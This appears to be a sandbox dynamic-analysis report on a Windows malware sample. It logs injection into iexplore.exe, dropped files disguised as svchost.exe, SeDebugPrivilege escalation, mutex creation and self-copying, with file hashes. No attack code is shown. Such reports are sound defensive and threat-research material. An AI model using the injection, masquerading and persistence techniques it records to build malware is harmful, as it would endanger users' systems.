staticcache.dat	0x02d70000	0x0369ffff	Memory Mapped File	r	-
msvbvm60.dll	0x72940000	0x72a92fff	Memory Mapped File	rwx	-
version.dll	0x74ba0000	0x74ba8fff	Memory Mapped File	rwx	-
dwmapi.dll	0x751f0000	0x75202fff	Memory Mapped File	rwx	-
uxtheme.dll	0x75210000	0x7528ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x752a0000	0x752a7fff	Memory Mapped File	rwx	-
wow64win.dll	0x752b0000	0x7530bfff	Memory Mapped File	rwx	-
wow64.dll	0x75310000	0x7534efff	Memory Mapped File	rwx	-
propsys.dll	0x75360000	0x75454fff	Memory Mapped File	rwx	-
comctl32.dll	0x75460000	0x754e3fff	Memory Mapped File	rwx	-
scrrun.dll	0x75570000	0x75599fff	Memory Mapped File	rwx	-
samlib.dll	0x755a0000	0x755b1fff	Memory Mapped File	rwx	-
shacct.dll	0x755c0000	0x755ddfff	Memory Mapped File	rwx	-
secur32.dll	0x755e0000	0x755e7fff	Memory Mapped File	rwx	-
wshtcpip.dll	0x757a0000	0x757a4fff	Memory Mapped File	rwx	-
mswsock.dll	0x757b0000	0x757ebfff	Memory Mapped File	rwx	-
sxs.dll	0x757f0000	0x7584efff	Memory Mapped File	rwx	-
profapi.dll	0x75950000	0x7595afff	Memory Mapped File	rwx	-
cryptbase.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
sspicli.dll	0x75980000	0x759dffff	Memory Mapped File	rwx	-
sechost.dll	0x759e0000	0x759f8fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75a10000	0x75abbfff	Memory Mapped File	rwx	-
imm32.dll	0x75c00000	0x75c5ffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75c60000	0x75cb6fff	Memory Mapped File	rwx	-
ole32.dll	0x75cf0000	0x75e4bfff	Memory Mapped File	rwx	-
msctf.dll	0x75e50000	0x75f1bfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f40000	0x75f85fff	Memory Mapped File	rwx	-
usp10.dll	0x75fa0000	0x7603cfff	Memory Mapped File	rwx	-
clbcatq.dll	0x76040000	0x760c2fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x760d0000	0x761bffff	Memory Mapped File	rwx	-
kernel32.dll	0x76220000	0x7632ffff	Memory Mapped File	rwx	-
ws2_32.dll	0x76450000	0x76484fff	Memory Mapped File	rwx	-
advapi32.dll	0x76490000	0x7652ffff	Memory Mapped File	rwx	-
oleaut32.dll	0x76720000	0x767aefff	Memory Mapped File	rwx	-
gdi32.dll	0x76a70000	0x76afffff	Memory Mapped File	rwx	-
shell32.dll	0x76b00000	0x77749fff	Memory Mapped File	rwx	-
lpk.dll	0x77810000	0x77819fff	Memory Mapped File	rwx	-
user32.dll	0x77820000	0x7791ffff	Memory Mapped File	rwx	-
private_0x0000000077a20000	0x77a20000	0x77b19fff	Private Memory	rwx	-
private_0x0000000077b20000	0x77b20000	0x77c3efff	Private Memory	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
nsi.dll	0x77df0000	0x77df5fff	Memory Mapped File	rwx	-
ntdll.dll	0x77e20000	0x77f9ffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	rw	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	address = 0x400000, size = 4096	1	Fn Data
Modify Memory	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	address = 0x401000, size = 249856	1	Fn Data
Modify Memory	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	address = 0x43e000, size = 0	1	Fn Data
Modify Memory	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	address = 0x442000, size = 4096	1	Fn Data
Modify Memory	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	address = 0x7efde008, size = 4	1	Fn Data
Modify Control Flow	#8: c:\users\aetadzjz\appdata\roaming\document\document.exe	0x94c	os_tid = 0xf0, address = 0x77e301c4	1	Fn

Created Files

»

Filename	File Size	Hash Values	Actions
C:\Users\aETAdzjz\AppData\Local\Temp\aETAdzjz.bmp	48.05 KB	MD5: 343fa15c150a516b20cc9f787cfd530e SHA1: 369e8ac39d762e531d961c58b8c5dc84d19ba989 SHA256: d632e9dbacdcd8f6b86ba011ed6b23f961d104869654caa764216ea57a916524 SSDeep: 768:wjof+RdBZJ2g653hvqs+Rcb+SBMdK4tztHDyecRa6Xs9X/jPlu6tKvUfsQscD:wjE+132lhisKZdltWeks9Ru6nsQscD	... File Actions Show Properties Download
C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\ut	48.05 KB	MD5: a634cb7eb39b833d885186b5ba1023f2 SHA1: c12e1a24fe39d4017ca8bade72dce2f128ca1f46 SHA256: 8806d6fd705d67f18eaa6c95806d405cd3a3a56e41636958a408973f602daebf SSDeep: 768:wjof+RdBZJ2g653hvqs+Rcb+SBMdK4tztHDyecRa6Xs9X/jPlu6tKvUfsQscL:wjE+132lhisKZdltWeks9Ru6nsQscL	... File Actions Show Properties Download
C:\Users\aETAdzjz\AppData\Roaming\svchost.exe	693.00 KB	MD5: 7cd1dbbd8457d59274642c9a6e3e60dd SHA1: 3b34e363b79ae598e50f01e1da1523fbd9c2252d SHA256: 0cc3133bbc266693fc23810fb99e57e99b4d1a110f174970aeea79c66d569ce7 SSDeep: 12288:ohSu1Z/EMlJIkTnz6sDsh+zZzuw1aoSqntqtH4qgSBDeiN2:EHzE2Jvi+17wo9nUVgCDeI2	... File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\i5e1s5g4-f4t3-t1y3-b4i3-k5w2v3b0v441\i5e1s5g4-f4t3-t1y3-b4i3-k5w2v3b0v441	0.09 KB	MD5: 7492126839f1d745231d8524f3dc1b93 SHA1: 76d4656a1de53b264e6a60b76b50eb16aab78875 SHA256: 8243ac68e751f62f873e2ca5ed944e8f1a5056142ae3d9fc72156e84ec1e2f4a SSDeep: 3:zQbHv0Ucd14JLgPuIxKiMq49FA6n:zQbH8Ucd14JLEtMhA6	... File Actions Show Properties Download

Modified Files

»

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\aETAdzjz\AppData\Roaming\svchost.exe	693.00 KB	MD5: 7cd1dbbd8457d59274642c9a6e3e60dd SHA1: 3b34e363b79ae598e50f01e1da1523fbd9c2252d SHA256: 0cc3133bbc266693fc23810fb99e57e99b4d1a110f174970aeea79c66d569ce7 SSDeep: 12288:ohSu1Z/EMlJIkTnz6sDsh+zZzuw1aoSqntqtH4qgSBDeiN2:EHzE2Jvi+17wo9nUVgCDeI2		... File Actions Show Properties Download

Threads

Thread 0xf0

463

10

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
Module	Get Filename	process_name = c:\program files (x86)\internet explorer\iexplore.exe, file_name_orig = C:\Program Files (x86)\Internet Explorer\iexplore.exe, size = 260	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76235235	1	Fn
Mutex	Create	-	1	Fn
Module	Get Handle	module_name = private_0x0000000000400000, base_address = 0x400000	1	Fn
Module	Get Filename	process_name = c:\program files (x86)\internet explorer\iexplore.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\program files (x86)\internet explorer\iexplore.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	1	Fn
Module	Get Filename	module_name = private_0x0000000000400000, process_name = c:\program files (x86)\internet explorer\iexplore.exe, file_name_orig = C:\Program Files (x86)\Internet Explorer\iexplore.exe, size = 260	1	Fn
Module	Get Filename	process_name = c:\program files (x86)\internet explorer\iexplore.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Load	module_name = OLEAUT32.DLL, base_address = 0x76720000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x767870a1	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76720000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x76733dcf	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x767307b7	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x76751ca9	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x76738e70	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x76737684	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x7673cc98	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x7676903a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x76736231	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x76735fea	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x76743f94	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x76744e9e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x7676db72	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x76752a8c	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x7676d737	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x7676e015	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x7676cc3d	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x7676d1c4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x7676d48c	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x7676d4c6	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x7676d509	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x7673e7bb	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x7673e496	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x7673ddf1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x7676d53f	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76772055	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x767720ea	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76772151	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x767721f5	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76772288	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76772335	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x767723d5	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76745934	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76745a98	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x767459b4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7679e405	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x7679ef07	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7679f00a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x7679ef47	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7679f15e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7679dbd4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7679ecfa	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x7679ea66	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7679d332	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7679ee2e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x7679ca11	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x7679cc5f	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x7679cde7	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7679c802	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7679ec66	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x7679d155	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x7673b0dc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x76755f3e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x76744fd0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x76740d2c	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x767559ed	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x7672f8b8	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75cf0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75d39d4e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75d00782	1	Fn
Module	Get Filename	process_name = c:\program files (x86)\internet explorer\iexplore.exe, file_name_orig = C:\Program Files (x86)\Internet Explorer\iexplore.exe, size = 260	2	Fn
Module	Load	module_name = VERSION.DLL, base_address = 0x74ba0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\version.dll, function = VerQueryValueA, address_out = 0x74ba1b72	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\version.dll, function = GetFileVersionInfoSizeA, address_out = 0x74ba1c9c	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\version.dll, function = GetFileVersionInfoA, address_out = 0x74ba1ced	1	Fn
Module	Load	module_name = SXS.DLL, base_address = 0x757f0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75837685	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x77820000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x77837d2f	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x77843150	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x7785e7a0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x77845281	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x7784451a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x77844413	1	Fn
Window	Create	class_name = ThunderRT6Main, wndproc_parameter = 0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors	1	Fn
System	Register Hook	type = WH_MSGFILTER, hookproc_address = 0x729a1e09	1	Fn
Window	Create	class_name = VBMsoStdCompMgr, wndproc_parameter = 0	1	Fn
Window	Set Attribute	class_name = VBMsoStdCompMgr, index = 0, new_long = 3940508	1	Fn
Window	Create	class_name = VBFocusRT6, wndproc_parameter = 0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors	1	Fn
System	Get Info	type = Operating System	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Window	Create	window_name = Source, wndproc_parameter = 0	1	Fn
Window	Set Attribute	window_name = Source, index = 18446744073709551600, new_long = 33554432	1	Fn
Module	Load	module_name = KERNEL32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76231245	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76220000	1	Fn
Module	Load	module_name = KERNEL32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76231222	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetProcessDEPPolicy, address_out = 0x7624eb9a	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetProcessDEPPolicy, address_out = 0x7624eb9a	1	Fn
Module	Load	module_name = OLE32, base_address = 0x75cf0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ole32.dll, function = CoCreateGuid, address_out = 0x75d315d5	1	Fn
Module	Load	module_name = OLE32, base_address = 0x75cf0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\ole32.dll, function = StringFromGUID2, address_out = 0x75d322ec	1	Fn
Module	Load	module_name = KERNEL32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76231809	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x764a4304	1	Fn
Module	Load	module_name = advapi32, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueA, address_out = 0x764a404a	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x76490000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x764a418e	1	Fn
Module	Load	module_name = KERNEL32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76231410	1	Fn
Module	Load	module_name = KERNEL32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x76234c6b	1	Fn
Mutex	Create	mutex_name = I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441	1	Fn
Module	Load	module_name = KERNEL32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76231136	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x76231b18	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441, type = file_attributes	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x76231b18	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441, type = file_attributes	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x76234259	1	Fn
File	Create Directory	C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441	1	Fn
Module	Load	module_name = KERNEL32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x762310ff	1	Fn
System	Sleep	duration = 50 milliseconds (0.050 seconds)	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76220000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x7624d4f7	1	Fn
System	Sleep	duration = 50 milliseconds (0.050 seconds)	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, type = file_type	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, type = file_type	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 65024	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 65024	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 65024	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 65024	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 65024	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 65024	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 65024	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 65024	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 65024	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 65024	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 65024	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 65024	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 65024	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 65024	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 65024	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 65024	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 65024	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 65024	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 65024	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 65024	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 59392	1	Fn Data
File	Write	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, size = 59392	1	Fn Data
File	Read	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 65024, size_out = 0	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Roaming\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441\I5E1S5G4-F4T3-T1Y3-B4I3-K5W2V3B0V441.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, type = time	1	Fn
